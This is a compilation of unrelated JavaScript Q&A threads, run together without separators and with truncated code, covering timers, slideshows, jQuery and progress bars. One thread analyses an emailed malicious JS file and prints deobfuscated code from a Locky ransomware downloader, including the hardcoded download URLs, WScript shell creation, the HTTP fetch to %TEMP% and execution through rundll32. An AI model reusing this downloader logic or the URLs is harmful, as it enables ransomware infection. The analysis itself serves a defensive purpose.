I have a setTimout loop being called repeatedly but the loop seems to catch up with itself and causes sticking on my page ect. I added a alert to see what was happening and i had the timer set to call every 10seconds, but the alert was being displayed oppressively faster until it was continuous
can anybody see why this is by my code below.
Many thanks
var running = setTimeout(function (){
var varLISTID = document.getElementById('datacatch').getAttribute("data-variable-LISTID");
var varUSERACCOUNTNAME = document.getElementById('datacatch').getAttribute("data-variable-USERACCOUNTNAME");
var varITEMACCOUNTNAME = document.getElementById('datacatch').getAttribute("data-variable-ITEMACCOUNTNAME");
var varSELECTEDUSER= document.getElementById('datacatchuser').getAttribute("data-variable-SELECTEDUSER");
var mylink = "loadmessages.php?listID=" + varLISTID + "&useraccountname=" + varUSERACCOUNTNAME + "&itemaccountname=" + varITEMACCOUNTNAME + "&selecteduser=" + varSELECTEDUSER;
var myotherlink = "contactselect.php?listID=" + varLISTID + "&useraccountname=" + varUSERACCOUNTNAME + "&itemaccountname=" + varITEMACCOUNTNAME + "&selecteduser=" + varSELECTEDUSER;
$(document).keypress(function() {
Someone has been sending JS files in an attempt to try and lure me (and presumably others) into running the file and compromising their system.
Thing is, I have Mac and taking a look at this code it doesn't seem to be useful on Mac. As a JavaScript developer I'm not really sure how useful it could be, even on a Windows computer.
Code is too large to fit here so I posted it up on GitHub:
What the heck does this code do?
I ran it in a sandbox and it results in a console error.
Decided to post here the results I found (and not in a comment) as it takes a bit more than 600 chars ;).
So - the first run of the script (as posted on by comment) will give this code after obfuscation:
Working on that - the code will run the following:
var IGv7=[Yc+Hu1+Yq8+Jj+KFg2+Ka6+Hk+OHi6+ULs4+EBb, Tj4 + Dk7+Pc2+Hj8+As + YXv5+TIk0+Rj+Kb3+NZa2+DVq+Vx+KIi+Yh4 + XTc5+NHe3+Pv6+ATm5, Tj4 + Dk7+Gl+QLu+Pr+KIi+So+Af1+Nu + Zz+Kb + Zn1+Ik+Vy4, Yc+It+Nd+Ty+Lc+DFu+Lf4+LEa4+Zh1 + Kc+LSk+Tu6, Vg7 + Tp7+AUi+OPo + Oi+NGu8+DXl1+Px9 + Fa + Js9+KPm];
// var IGv7=["http://econopaginas.com/kudrd", "http://baer-afc2.homepage.t-online.de/4yhgvna", "http://jhengineering.szm.com/on9wjn", "http://otwayorchard.net/eo240k", "http://rejoincomp2.in/1tdqo6"]
var Xl3=WScript[Sk6 + STd1 + Jz + GNu0](Zn4 + ALt + Qs8 + UQw);
// Xl3=WScript["CreateObject"]("WScript.Shell");
// Lets say X13 == SHELL
var XWe=Xl3.ExpandEnvironmentStrings(ZFq + YMy6);
// var XWe=SHELL.ExpandEnvironmentStrings("%TEMP%/")
var NQf6=XWe + Vm0 + LCo + Bp + Ty0;
// var NQf6=C:/TEMP/XfZn0ghPqqlucK
var Nt5=NQf6 + Aq4 + FQn5;
// var Nt5="C:/TEMP/XfZn0ghPqqlucK.dll"
var Vu = Xl3.Environment(Cf8 + EMb);
// var Vu = C:/system
// PUb + YZg2 + BMc + Bs8 + DEa + HSu1 + Db4 == "PROCESSOR_ARCHITECTURE"
if (Vu(PUb + YZg2 + BMc + Bs8 + DEa + HSu1 + Db4).toLowerCase() == "amd64")
// Check if we are in amd64
var UFn4 = Xl3.ExpandEnvironmentStrings(OMi0);
// var UFn4 = "%SystemRoot%\SysWOW64\rundll32.exe"
var UFn4 = Xl3.ExpandEnvironmentStrings(DCx);
// var UFn4 = "%SystemRoot%\system32\rundll32.exe"
var SPz0=[WQp1 + WCl1 + TYr1 + Np, Wd + CMz6 + Ey7 + GXj + Kk2 + Fb8 + POy1];
// SPz0=["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"]
// Try to create the XMLHTTP object
for (var Lp9=0; Lp9 < SPz0[ETi8 + Fp]; Lp9++)
var MBi0=WScript[Sk6 + STd1 + Jz + GNu0](SPz0[Lp9]);
catch (e)
var OPr3 = "";
// FIj2 + HOf + LBa1 + ZJo + MPr8 + Az + DZx6 == "Scripting.FileSystemObject"
var fso = new ActiveXObject(FIj2 + HOf + LBa1 + ZJo + MPr8 + Az + DZx6);
var MTm6 = uheprng(Math.random().toString());
var ENa6=1;
// Check ACTIVEXOBJECT_FileSystemObject[FileExists](dll file from before)
if (fso[DQq + Js + Va + Vn](Nt5))
var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;
OPr3 = DAb4+ZYz;
// check if the same dll file with ".txt" extension exists
if (fso[DQq + Js + Va + Vn](OPr3)) {
// run quite()
this[Dv + Dx + Go7][Jh + Nz3](824 - 824);
var HFw3 = MTm6(IGv7[ETi8 + Fp]);
if (1== ENa6)
// Do a GET request to the url "http://jhengineering.szm.com/on9wjn"
MBi0[NOc6](YRk1 + XWj, IGv7[HFw3++ % IGv7[ETi8 + Fp]], false);
MBi0[BBw + Co]();
if (MBi0.readystate < 4)
// WScript["Sleep"](100);
WScript[SJl + Hj](100);
var Nf=WScript[Sk6 + STd1 + Jz + GNu0](YPt6+CXb+Tv0+Da1 + Ng2);
// var Nf=WScript["CreateObject"]("ADODB.Stream")
// ADOBE_SCRIPT[open]()
// ADOBE_SCRIPT[type] = 1
// ADOBE_SCRIPT[write](content from the XMLHTTPRequest we just did)
Nf[Vr3](MBi0[Nb + Re + HKj + Zk]);
// Set position of the adodb.stream to 0
Nf[Hz + QWh5 + VSo5]=0;
// Save the content to the file NQf6 (the file in c:/temp)
Nf[WGa + Yh + OAk](NQf6, IDz0);
// close the file
Nf[Cz + FLv2]();
Still working on the rest, will update here with more info :)
It seems to run wscript which is a windows program to make administrative changes, yes that sounds like bad news for windows users who run this :P
And it uses 2 arrays to obfuscate the code, that will be run with eval, if anyone is not on a phone like me, copy the last lines starting by var Q1 and replace eval with console.log. this will output the js code that will probably show what evil it contains. It might be minified so run it trough a js prettifier, maybe it will have arrays again to obfuscate code again LOL, code inception.
Sadly I'm on a phone otherwise it would be a nice puzzle xD
Edit: too curious, gonna look into it with jsfiddle on my phone, touchscreens are a nightmare with stuff like this..
Code inception!
See the js output it generates, more obfuscation, we must go deeper!
To sum it up: this is a downloader. It downloads an encrypted DLL from one of four hardcoded URLs, decrypts it (simple XOR with a PRNG stream) and then runs using rundll32 (with a specified parameter). The DLL contains Locky ransomware.
I'm working on this automated, non-endless slideshow, with dynamically loaded content. Each image has to be acompanied by sound. So far I got dynamic loading of both images and sounds down. But it all happens at once, which it shouldn't. I figured, that setTimeout can come in handy here, to set the interval between each pair, but all I got is either last image multiplied by the iteration count or script not working at all. delay also didn't prove to be of any help.
Here's whot I got so far:
function displayImages(data){
var count = data;
var pixBox = $('#picture-box');
var imgPre = 'resources/exhibit-';
var imgExt = '.png';
var sndExt = '.wav';
for(i = 1; i < count; i++) {
var imgSrc = '<img src="' + imgPre + i + imgExt + '">';
var sndSrc = new Audio(imgPre + i + sndExt);
My question is: how to set the setTimeout (or whatever function is the best here), for it to iterate over time. Say, to set the change of img/sound pairs every 2 seconds?
You can use setTimeout like this:
function displayImages(cur, total){
var pixBox = $('#picture-box');
var imgPre = 'resources/exhibit-';
var imgExt = '.png';
var sndExt = '.wav';
var imgSrc = '<img src="' + imgPre + cur + imgExt + '">';
var sndSrc = new Audio(imgPre + cur + sndExt);
return setTimeout( 'displayImages(' + ((cur+1)%total) + ',' + total + ')', 2000 );
And start it off like this: displayImages(0,total) where total corresponds to your data variable.
The reason I like to use setTimeout and not setInterval in these situations is that setTimeout is only called after the previous function has completed. setInterval can get back-logged and freeze up your page.
Note that the function returns a handle for the timeout. If you should want to stop the animation, you can do this:
var animation = displayImages(0,total);
...some code...
and the animation will stop.
You can use a setInterval, this does the same code at every interval.
var myInterval = window.setInterval(displayImages, 2000);
This will make sure your function gets called every 2000 milliseconds.
More information on MDN setInterval
You can try something like this
$(function() {
var count = 100;
var i = 0;
var repeat = setInterval(function() {
if (i <= count) {
var imgSrc = '<img src="' + imgPre + i + imgExt + '">';
var sndSrc = new Audio(imgPre + i + sndExt);
i = 0; //reset count if reaches threshold.
}, 5000); //5 secs
With this, if you want to reset the interval on any event you can simple call
See a setInterval example here: JSFiddle
var i = 0;
setInterval(fadeDivs, 3000);
function fadeDivs() {
i = i < images.length ? i : 0;
$('#my-img').fadeOut(200, function(){
$(this).attr('src', images[i]).fadeIn(200);
I've got a JQuery click event that doesn't seems to be firing at all. If I am missing something I'm almost certain it's something trivial. I've tried debugging the code via Chrome but the button click on the Filter button is not even hitting the breakpoint.
$('#filter').click(function () {
var dataurl;
var visit = $('#visitFilter').val;
var dns = $('#dnsFilter').val;
var visitdate = $('#visitDateFilter').val;
var entrypage = $('#entryPageFilter').val;
var timeOnSite = $('#timeOnSiteFilter').val;
var timeonsiteselector = $('#timeOnSiteSelector').val;
var pages = $('#pagesFilter').val;
var cost = $('#costFilter').val;
var city = $('#cityFilter').val;
var country = $('#countryFilter').val;
var keywords = $('#keywordsFilter').val;
var referrer = $('#referrerFilter').val;
dataurl = "http://localhost:56971/VisitListFilter/28/" + visit + "/" + dns + "/" + visitdate + "/" + entrypage + "/" + timeOnSite + "/" + timeonsiteselector + "/" + pages + "/" + cost + "/" + city + "/" + country + "/" + keywords + "/" + referrer + "/" + "?format=json";
$('#VisitListTable').bootstrapTable('refresh', {url: dataurl});
I've also created a fiddle here with the full code: https://jsfiddle.net/W3R3W0LF666/epu54yc4/1/
Remember .val() is a function.
You need to use () when invoking a function. Currently you are just passing the function reference.
var visit = $('#visitFilter').val(); //Note ()
It is getting fired.
Replace all .val with .val() as .val() is a jquery function for getting values.as :
var dns = $('#dnsFilter').val;
I have a javascript function that opens a login.htm window in the mode I would like after I click a button on my index.htm page ....
function openApp() {
var options = "channelmode=" + 1 +
",resizable=" + 1 +
",menubar=" + 0 +
",toolbar=" + 0 +
",location=" + 0 +
",titlebar=" + 1 +
",status=" + 1 +
",scrollbars=" + 1;
var name = "reporting";
var appURL = "login.htm"
var newWindow = window.open(appURL,name,options);
It works fine but now I would like to move the functionality of opening the window into the login.htm window on load function.
For example if someone goes to login.htm itself, i want the window to open up in that mode.
I've tried a few things but can't figure this out. Can someone please help me.
I am using jquery so I could do it using jquery.
If you've got a DOM element with a click event that opens the login.htm and you want to open a new window as well with the same window properties if another DOM element is clicked just set the click event to that that DOM element, as in <span onclick="openApp()">Login</span>.
You could navigate to the log in page and set a setTimeout.
Just place this code in the log in page that the user navigates to, and it will open a new window on its own after the log in page DOM is loaded.
<script type="text/javascript">
setTimeout(function () {
var openApp = function () {
var options = "channelmode=" + 1 +
",resizable=" + 1 +
",menubar=" + 0 +
",toolbar=" + 0 +
",location=" + 0 +
",titlebar=" + 1 +
",status=" + 1 +
",scrollbars=" + 1;
var name = "reporting",
appURL = "login.htm",
newWindow = window.open(appURL, name, options);
}, 100);
You would take the section that var options is being set and put it outside of the openApp() function, like so:
var options = "channelmode=" + 1 +
",resizable=" + 1 +
",menubar=" + 0 +
",toolbar=" + 0 +
",location=" + 0 +
",titlebar=" + 1 +
",status=" + 1 +
",scrollbars=" + 1;
function openApp() {
var name = "reporting";
var appURL = "login.htm"
var newWindow = window.open(appURL,name,options);
Then you can call openApp() however you'd like.
If you want to run openApp() to execute when the whole page is fully loaded (i.e. all images are loaded) then you'd do the following:
If you want to execute openApp() when the document is in its "ready" state (when he DOM is available to manipulate), then do the following:
I have to load a very big JSON object and perform various expensive processes. For this reason, I am showing a progress bar which increments a total of five times. If I have to load 10000 items, it will update every 2000 times, etc.
The problem is the effect is not visible because all the stack executes after the entire function is complete, instead of updating the progressbar at every 20% of the process. It doesn't matter if I try to load 10000 items or 2 million items, same stuff happens, and judging by the computation delay between console logs, there is definitely enough processing time to show a visible progress effect. Perhaps I'm not understanding the javascript for(I know this wasn't the way to do it). How do you track an expensive process and make a visible progress bar effect properly?
This is the js file.
login with
username : admin
password: testit
var initItems = function(publicationItems) {
var publications = new Array();
var numberOfItems = goog.object.getCount(publicationItems);
var minStep = 20;
var currentProgress = 20;
var progressBarStep = parseInt(numberOfItems / 5);
var i = 0;
goog.object.forEach(publicationItems, function() {
var currentName = publicationItems.name;
var currentCat = publicationItems.categories;
// Insert clear div to break line after every 5 items.
if (i % 5 == 0 && i != 0)
if(i % progressBarStep == 0)
console.log(i + ' ' + progressBarStep + ' ' + currentProgress + ' ' + progressBar.getValue());
currentProgress += minStep;
publications.push(goog.dom.createDom('div', {
'style' : 'width:' + this.currentPublicationDimension + 'px;height:' +
this.currentPublicationDimension + 'px;border:1px solid #B3B3B3;' +
'float: left;margin-top: 5px;background-color: #FCFCFC;' +
'max-width:' + this.currentPublicationDimension + 'px;max-height:' +
this.currentPublicationDimension + 'px;_height:' +
this.currentPublicationDimension +
'px;_width:' + this.currentPublicationDimension + 'px;margin-left:' +
this.publicationLeftMargin + 'px;',
'class' : 'publication'
}, currentName, currentCat));
}, this);
return publications;
And the context from where this function was called:
// Bind COMPLETE event listener to ajaxHandler.
goog.events.listen(ajaxHandler, goog.net.EventType.SUCCESS,
goog.bind(function(e) {
//goog.style.showElement(progressBarContainer, false);
goog.dom.append(this.mainViewPublications, initItems.call(this, e.target.getResponseJson()));
}, this), false, this);
The problem is that JavaScript is Singlethreaded and first tries to execute the calculations. The ProgressBar is asynchronous and will only update, if the thread is not busy.
You could use callbacks like following
function a () {
/* do one iteration */
goog.Timer.callOnce(a, 10);
The Problem with that, is that you can't pass parameters to the function and you have to use global variables (or at least 'object' wide variables).
I currently have the same issue and haven't found a really good solution. So this is a first approach. If I find another solution I will update it here.